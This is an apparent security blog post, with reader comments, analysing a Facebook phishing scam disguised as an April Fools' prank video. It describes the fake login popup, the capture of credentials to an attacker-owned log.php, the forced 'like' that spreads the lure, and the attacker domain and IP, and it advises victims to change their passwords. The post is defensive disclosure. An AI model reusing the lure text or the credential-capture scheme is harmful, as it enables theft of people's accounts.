A scam disguised as an April Fools' prank video is stealing Facebook usernames and passwords from victims. The scam also automatically "likes" the bogus video so that a message similar to the following appears on the victim's Facebook wall:
Video: This is the best April Fools' prank ever!
cotyperfume.info
Damn, that was so unexpected! Freaking awesome
When one of their Facebook friends clicks the cotyperfume.info link, it redirects to http://apps.facebook.com/aprilfoolsprank/. And when they try to view the video, unbeknown to them they are really loading a malicious javascript from the attacker's domain (173.231.144.82). The script displays a popup that reads:
Not Logged In
Please log in to continue.
If the victim clicks login, the script then delivers a bogus Facebook login page on the same http://app.facebook.com/aprilfoolsprank/ page. When the user enters their Facebook username and password, a form of clickjacking delivers the credentials to log.php on the attacker owned domain. The following message may also be delivered:
Please re-enter your password
The password you entered is incorrect. Please try again (make sure your caps lock is off).
Forgot your password?
Clicking "Forgot your password" directs to another file on the attacker owned domain: /recover.php?email_or_phone=addressremoved%40yahoo.com">Request a new one.</a> This file is currently removed so it's not known what would have transpired, but it's interesting to see the email address so visibly exposed (removed for this blog post). Whether the address actually belongs to the attacker or is from a hijacked email account is also unknown.
Meantime, the attackers have also silently forced the user to "like" the video, so now they have a message on their wall, telling all their friends:
Video: This is the best April Fools' prank ever!
cotyperfume.info
Damn, that was so unexpected! Freaking awesome
Oh, and the video that was supposedly so "freaking awesome"? There isn't one. The attackers just embedded a picture of a blank screen on the page.
What to Do if You Were a Victim
If you were a victim of the Facebook April Fools' phishing scam, you need to change your Facebook password immediately. If you used the same password for your email account, you will need to change that as well.
This happened to me…what am I supposed to do now? Change my password? Thank you for your help.
David
Hi David,
Sorry – I should have included that info in the blog post. Yes, you should change your Facebook password. And if you used the same password for email, you need to change it there as well. I updated the blog post to include this – thanks for the reminder!
– Mary
If you have HTTPS enabled for your Facebook account you will get a warning when you click this link. Thankfully I have it enabled and declined viewing the link after seeing the warning.
Adam Smolkowicz
hey thanks for the heads up
Adam Smolkowicz